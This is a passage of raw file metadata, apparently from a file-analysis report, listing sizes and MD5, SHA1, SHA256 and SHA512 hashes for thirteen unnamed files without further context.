SHA512e6eb166d1ef04a497141c542e2bb64198e4809163e19d29abc4ff7a6c05f43a1ce7d3f24b8e193efabd3c9991f1e72ae735a09933e7a65f3b0e93b3130f6c7d6
-
Filesize
891KB
MD5120d3314cf0079c9023f51c1825685c4
SHA1bd4cc388c5d622baa3712aca81c7df3bd6191f96
SHA256b779e93f5e9960ac870dadb8e8e69de7b6694f366c7c40b2f11d2b840dff92cb
SHA512fa1006daafb1ed581a6e9841a6a28915751e17766dee871c3503581a135d5e431ffa9b12adde129cdc4fd747f88732bfed5daa002b87a01c3674af2abc3a4c91
-
Filesize
5.0MB
MD531b5946b1588a4e8cabf23e53683e8ac
SHA104606000c915d50b11e7f2e0f00942bb30277319
SHA2568ccc6bd77f714780cb7d73c9924f122775947c20737289e54d1ffa753b937f8d
SHA5127c38da568e202f844bf6a07c1e07f1959be78c2f955a3363293616897fff6356004c736c0b8e1f1d02018f838bb43843f7c566d53f9bd277c9b3f213ff636228
-
Filesize
10.9MB
MD5d43ac79abe604caffefe6313617079a3
SHA1b3587d3fa524761b207f812e11dd807062892335
SHA2568b750884259dd004300a84505be782d05fca2e487a66484765a4a1e357b7c399
SHA512bb22c73ed01ff97b73feb68ae2611b70ef002d1829035f58a4ba84c5a217db368aae8bdc02cdec59c1121922a207c662aa5f0a93377537da42657dd787587082
-
Filesize
200KB
MD5d050234371767864e62dec5e015e5a97
SHA1a79f522437369265febe88afd65d86eb67d3b4e7
SHA256ab59931fb0325a31ac86e463f06c01cbb8a8c8ad2f2512a19e84698af282900a
SHA51264bdbabd5a3929791fa1aa3f1a7b29513c04655e0220ab90a9cfbd7c496f75978caf962fddc4a34936323add2a07a1ee3d6484cc8378ae537bc9c1ec1d429455
-
Filesize
239KB
MD510e0a2fd9a2d7c160d1a261fe31c2142
SHA12a19599e58d0e10dd6b8cec8d59b0252cbd99e6c
SHA25685f3863f8213884fa767d8c9bc9d7b1c548e1dc7c22010a085c4ccfbe9dbda4d
SHA512bbe4ec741ff14b1291d6d807505217817d1d0ad55ba08e4a657482fd7dfc13e0c3b86eade8e5aef3ed90043b6f250fc6d24c816fc18ff97e2cf7af70116dd837
-
Filesize
8.5MB
MD5c132fc5f059d4de575d6dd85b9437d9d
SHA18fe57653140b5c9f5807ba975f0c2ffc611540fc
SHA25646a251c26a1f037892b59099785e589022b2d58045e5bcbb91ae03ea4d3114f8
SHA5125a6ac60522bdd0555b520fb16ed5e25f7df3b4e3b90866732f79edd5104ddd8f16ce52c7f0ba1cea398a6c5e0d0f7d2cca64d628025407f0ace3360250c67bd1
-
Filesize
7.3MB
MD538589310dc06522f6878412e346b0228
SHA139acb33c85d3c1420de39be99e6ae959cf5ced84
SHA2563b6f6fa401772dfc3d07ac86a6da2f2107a0e6172900d01cb34d5093bcbec6c3
SHA512355ea968535b0cb6ddb12cb89917a381d3c24e6b1853b2aecd20b0a2a3027ca923f8623762017c92644bfdce5a350924f8341c9ef3a988ddf81837cfcf132924
-
Filesize
5.8MB
MD5e9122c4a8313d3fa2a77961523dc1f3a
SHA1e759d10825a3971fd8dfcaee1e8a3257005ce510
SHA256c50edc34aed88e8c744ab3f52fe2cba34b498ae3c9f553b286c5771264a61819
SHA51290d46c63c57c91d1d126da3cada27a3f062020c879a9982999ad5f6c418132aef96d70751f037a74a427f61b83451e8f15698671920f829d0bbf55fe29eb1d90
-
Filesize
5.8MB
MD5286a0c1c7702d8d7f086f8c84f210096
SHA1fad809ce110c7b82a6288e833d054e117f0e88d0
SHA256138823bedb8ea95458b904821f97daca5858aa8d919ebd41c0325c514d80cd18
SHA51280f79687a24d7bbbfc7fba652a279c541081d51836b71662b6836e687709a5eaaf97dc43135a5bc99da09da2865e3b4e9355d5af7a1f99ffe008232b0e0c0d43
-
Filesize
4.1MB
MD5e2d0b0f5a01e9644ea01b19addf1aba3
SHA1e0f393367d89bbbf97801ee0b86edd97097c2a1c
SHA2566e5d8976685d57f723aeaf695caedf2451cdb6022d6bff8c7b3d6916c9c84a9b
SHA51279fa1cd4f617ef97d669992251f3b645f4654a15626c95245aa593d2e5bb959283118801e800200eb4aecd178516f6c9baa760a165f7d4c69431bf351562d797
-
Filesize
8.8MB
MD50b32fe9541cc064afc9308ca042b6307
SHA1807ea996ef898c202262b188c7226970c18f5981
SHA2566dea895bedce0987f799a5e7d511545bb86f0bc781f7ba2418456532fee8f302
SHA5126ebdeaa5493cf892dc86da05e17e60205fdf0bf2d61c8de105aada6201f889d7edb92e9bd89a36e306836db63b6a7d419d0c22fab99fc87535748f5394a79910
-
Filesize
3.5MB
MD55db8857cca603a760cfb6955f5c309cf
SHA16256f8199587182efb4f0941fb7668cb72e334cb
SHA2560218aa4e18dd2db185038c9dfb349e9eff5d4c49ee910590e815e88323a6f642
SHA5124e67e73d0e8742f660ebc6fe7eab143ab2154c774f9987ba950b24217bee13b009d44bde26e3e4bc37915d0f264b39965bec8c4c49534ef2a55888bc97a19665